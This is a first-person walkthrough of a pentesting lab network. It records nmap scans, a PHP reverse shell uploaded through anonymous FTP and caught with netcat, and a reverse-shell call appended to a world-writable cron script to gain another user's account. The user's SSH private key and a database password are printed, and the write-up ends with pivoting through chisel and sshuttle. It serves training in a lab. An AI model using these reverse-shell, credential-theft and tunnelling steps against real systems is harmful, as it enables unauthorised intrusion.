Snap-labs (Entry Level Pentesting)

After we have downloaded our vpn file we can vpn into the network

First i want to scan the Esge network and see if i can gain a foothold on one of the edge machines

 sudo nmap -sCV 10.10.0.0/24 -oA edge_machines

results

10.10.0.4

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a0:3e:31:d7:16:fe:28:78:8b:5b:90:72:42:e5:67:a4 (RSA)
|   256 56:09:1f:b0:b1:88:47:01:e4:5a:4d:c1:89:13:60:1f (ECDSA)
|_  256 d9:74:e4:6f:05:49:54:d3:ec:ed:7a:1c:b4:76:1d:c4 (ED25519)
80/tcp  open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=33e9fb8d175421613fb4.access-snaplabs.io
| Subject Alternative Name: DNS:33e9fb8d175421613fb4.access-snaplabs.io
| Not valid before: 2024-01-10T00:00:00
|_Not valid after:  2024-04-09T23:59:59
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

• Ubuntu machine

• HTTP and HTTPS web server Apache 2.4.41

• SSH

10.10.0.103

PORT    STATE SERVICE  VERSION
21/tcp  open  ftp      vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.0.4
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0           10918 Jul 25  2021 index.html
|_drwxrwxrwx    2 0        0            4096 Jul 25  2021 temp [NSE: writeable]
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ab:8f:b8:06:41:f2:dd:92:cd:c4:92:60:53:d4:cf:2e (RSA)
|   256 ac:96:0a:75:d0:88:ca:16:87:5f:7d:5b:a4:6f:cd:9e (ECDSA)
|_  256 5e:ce:7a:e3:90:9e:dd:a7:4d:24:0f:8e:a3:d7:23:07 (ED25519)
80/tcp  open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
443/tcp open  ssl/http nginx
| ssl-cert: Subject: commonName=10.10.0.103
| Not valid before: 2021-07-17T14:19:12
|_Not valid after:  2021-08-16T14:19:12
| http-robots.txt: 54 disallowed entries (15 shown)
| / /autocomplete/users /autocomplete/projects /search 
| /admin /profile /dashboard /users /help /s/ /-/profile /-/ide/ 
|_/*/new /*/edit /*/raw
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was https://10.10.0.103/users/sign_in
|_ssl-date: TLS randomness does not represent time
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

• FTP (anonymous access allowed

• SSH

• HTTP and HTTPS

• we can see the robots.txt

10.10.0.181

Nmap scan report for 10.10.0.181
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c3:a6:3b:dc:4a:19:ba:d3:97:ce:7f:d3:df:af:da:df (RSA)
|   256 5e:9f:ee:d8:c8:5a:42:95:96:27:39:61:58:94:a6:d8 (ECDSA)
|_  256 88:4d:51:17:06:bd:d2:8b:d7:3e:3c:79:7d:d5:38:95 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (4 hosts up) scanned in 126.05 seconds

• SSH

• HTTP web server

Letts scan all ports on targets to see if we are missing anything

sudo nmap -p- --min-rate 10000 10.10.0.103 -oA all_ports_10.10.0.103
sudo nmap -p- --min-rate 10000 10.10.0.181 -oA all_ports_10.10.0.181 
sudo nmap -p- --min-rate 10000 10.10.0.4 -oA all_ports_10.10.0.4

the only new Ports we have found was for host 10.10.0.103

results

Nmap scan report for 10.10.0.103
Host is up (0.24s latency).
Not shown: 65486 closed tcp ports (reset), 43 filtered tcp ports (no-response)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
443/tcp  open  https
8060/tcp open  aero
9094/tcp open  unknown

10.10.0.103

Looking through the output we can see machine 10.10.0.103 allows for anonymous FTP access, seems like a good place to start

ftp anonymous@10.10.0.103

listing the contents we can find the following

• include in report, anonymous access via FTP

• we can see we have read access to the index.html

• and we have rwx privileges within the temp directory

Looking in the directory we can see anything

Lets checkout the webserver and see if it is connected in some way to the ftp server

• we can the default Apache installation page

• we can confirm this is indeed ubuntu

• this is concerning, we have anonymous access to the root directory of the web server via FTP

Lets checkout HTTPS

we can see a Gitlab application

• Not much here

I want to test, if we can upload a php reverse-shell to the ftp's temp directory and trigger it in the url

1. copy our php reverse-shell into our working directory

cp /usr/share/webshells/php/php-reverse-shell.php ./

1. add your IP and port for connection

2. login into the FTP server

ftp anonymous@10.10.0.103

1. change into the temp directory

2. upload our rev.php shell

put rev.php

1. start a nc listener

rlwrap -cAr nc -lvnp 9001

1. navigate to http://10.10.0.103/temp/rev.php , if we look back at our listener we should have a shell on 10.10.0.103

we have our 1st shell woohooo

Lets enumerate the other web server and come back

HOST 10.10.0.181

when we click on "show me the goods" we can see the following

Looks like PHP syntax (given the get_repos.php?), it is an array with the following key-value pairs

• name: Looks like a possible web directory, project or role website-dev

• location: The location or URL is https://10.10.0.103/brandon/website-dev

• author: The author of the website is "brandon"

• access: the level of access is set to public

Lets check this url out and see if we can find anything interesting

Looks like we access to that gitlab server we found earlier

• Add to report (Sensitive information expsoure)

• noothing interesting in these files lets check the commit history

Checking through the commits we do find something interesting

Looks like we have a set of creds, for the host 10.10.1.111 Database gitlab, could be reusable

sa: VeryVeryVerySecure1!

• sensitive information exposure

• within the internal subnet

• try anywhere we can

host 10.10.0.103

Lets see if we can access the gitlab server using these credentials

• No luck

host 10.10.0.103 WEB-2 shell as www-data

Alright now we have our initial foothold within one of the external servers, lets get to know our landscape

Lets upgrade our current shell, since this is an ubuntu server python3 should already be installed so

python3 -c "import pty;pty.spawn('/bin/bash')"

first i want to find any creds, keys anything to up escalate our privileges

1. we need to find what users are on the system

cat /etc/passwd

we do find one user on the system

1. Lets see if we can find anything within the user brandon's home directory

ls -al /home/brandon

• we do see a .ssh directory, lets see if we can find any private keys

• we do not have permission yet, Lets see if we can su users and use the credentails we found ealier during the git commits

• no luck

Lets download linpeas.sh onto WEB2 and see if we can find anything interesting

1. copy linpeas to working directory

cp /opt/linpeas/linpeas.sh ./

1. start a python3 server

python3 -m http.server 80

1. from our shell on WEB2 lets download the script within the /tmp directory

wget http://10.9.254.6/linpeas.sh

1. lets run the script

bash ./linpeas.sh > linpeas.output

• i personally like saving linpeas to a output file, easier to reference later on

1. Lets start a python http server on WEB2 so we can download our linpeas.output file

python3 -m http.server 9000

1. Lets download it to our local host

wget http://10.10.0.103:9000/linpeas.output 

we do find something interesting happening in the cron.d directory

cd /etc/cron.d

we can see a cron job that isnt defualt

• we can see the user brandon is executing the /etc/log-time.sh script, lets see what permissions we have on the script

ls -al /etc/log-time.sh

• we can see the permissions for everyone is read, write, execute, meaning we should be able to drop a bash reverse-shell in the script, and when executed we should gain a shell as the user brandon

1. Lets reuse our rev.php script, we will change the port number to another in my case port 9010

2. start a python server

python3 -m http.server 80

1. download our rev1.php to our /tmp directory

cd /tmp
wget http://10.9.254.6/rev1.php

1. now we want to append the the log-time.sh script, to run our PHP script

echo "php /tmp/rev1.php" >> /etc/log-time.sh

1. now we just need to wait for the cronjob to execute and we should have a hit on our listener

Note i was having problems executing our rev1.php so i decided to reuse the rev.php we place in the /var/www/html/temp/ directory

1. modify the log-time.sh script

echo "php /var/www/html/temp/rev.php" >> /etc/log-time.sh

1. start a listener on port 9001

rlwrap -cAr nc -lvnp 9001

1. we get a hit after the cronjob executes

• we know have a shell as brandon

Lets look through brandon's .ssh directory and see what we can find

we do find brandons private key

cat /home/brandon/.ssh/id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

Lets copy this to our nlocal hosts and ssh into the machine

1. give it the neccasary permissions

chmod 600 id_rsa 

1. Lets see if we can authenticate to WEB2

ssh -i id_rsa brandon@10.10.0.103

we now have SSH access to WEB2 machine

Lets start branching out to other devices on the network

checking the networking interface within WEB2

HOST 10.10.0.181 WEB1

Lets see if we can SSH into 10.10.0.181 using brandon's private key

ssh -i id_rsa brandon@10.10.0.181 

• woohoo we can

Lets check if there are any other users on the box

cat /etc/passwd

• no other users

Lets run linpeas and see if we can find anything

we should still have our python server up so we can

cd /tmp
wget http://10.9.254.6/linpeas.sh
bash ./linpeas.sh > WEB1LP.output

Lets downbload the linpeas output file

1. start a python server on WEB1

python3 -m http.server 9000

1. download the output file to our local machine

wget http://10.10.0.181:9000/WEB1LP.output

• not alot to go with will review later

Now we have access to both WEB1 and WEB2 external servers, we need to find a way to start pivoting into the internal servers located in the 10.10.1.0/24 subnet

1. we need to find the IP address of the internal hosts (if we are not looking in our snap lab)

• we can write a quick bash script to scan the internal subnet

for i in {1..255}; do (ping -c 1 10.10.1.${i} | grep "bytes from" &); done

1. save this to a .sh file and upload it to the WEB1 host using a python server and wget

# local machine
python3 -m http.server 80
#web1 ssh shell
wget http://10.9.254.6/ping_internal.sh

1. Now lets execute the script

bash ping_internal.sh

we can see we have two IP addresses

10.10.1.100
10.10.1.111

i want to perform some port scanning on the internal servers, or atleast identify any open ports

Lets utilze chisel

1. clone the repo

git clone https://github.com/jpillora/chisel.git

1. within the chisel directory we want to run go build

2. within /chisel/executables/linux we will find the executable, i like to change the file name for ease of typing

mv chisel_1.9.1_linux_amd64 ch.sh

1. Lets upload it to WEB1, your python server should still be up and running

#WEB1
wget http://10.9.254.6/ch.sh

1. First we want to set up the chisel server on our local machine

./ch.sh server -p 9010 --reverse

• -p: allows us to specify what port chisel listens on

• --reverse: tell the server (us) that we want clients connecting in to be allowed to define reverse tunnels, essentially meaning clients connecting can open listening ports on our local machine

1. Now the client (WEB1) since we have already transfered the ch.sh (chisel) the basic syntax includes

./ch.sh client <serverip (our local machine ip)>:<server port (our local machine port) <remote string> <optional more remote strings>

./ch.sh client 10.9.254.6:9001 R:1080:socks

1. looking back at our local machine we should see a connection

Now we can configure our proxychaines file to route through chisel

1. We need to configure our proxychains.conf file

sudo vi /etc/proxychains.conf

1. we need to create an entry pointing to our local host and port 9010

Now we should be able to proxy our nmap scan through proxychaines and chisel

we should be able to scan the internal network

sudo proxychains -q nmap -Pn 10.10.1.100
sudo proxychains -q nmap -Pn 10.10.1.111

- hmm it didnt work

lets try sshuttleinstead

we will target WEB2 (10.10.0.181), if we remeber this was the web server that is connected to a Database

for reference

to initiate sshuttle we can

sshuttle -r user@targetsip targetsubnet -e 'ssh commands, are we using a key?"

sshuttle -r brandon@10.10.0.181 10.10.1.0/24 -e "ssh -i id_rsa"

Now we should be able to run nmap scan's (on particular ports), since we know the there is a connection to a database, and we know there is a windows Domain Controller most likely mssql which the default port is 1433

sudo nmap -p 1433 -Pn 10.10.1.111

• we are having problems with nmap going through sshuttle

we know it is connected to the database, we should be able to connect

for this we will use impackets mssqlclient,py

Lets try chisel again

Lets create a socks proxy to we can proxy through 10.10.0.181 into the internal subnet of 10.10.1.0/16

1. target server 10.10.0.181

#upload chisel
./chisel client 10.9.254.6:9001 R:socks

1. local machine

sudo /opt/chisel/chisel server -p 9001 --reverse

1. Scanning 10.10.1.111

proxychains -q nmap -sT -Pn -F 10.10.1.111 

• -q: quiet

• -sT: Syn scans wont work through our pivot, we have to specify a full tcp connection

• -F: switch for fast scan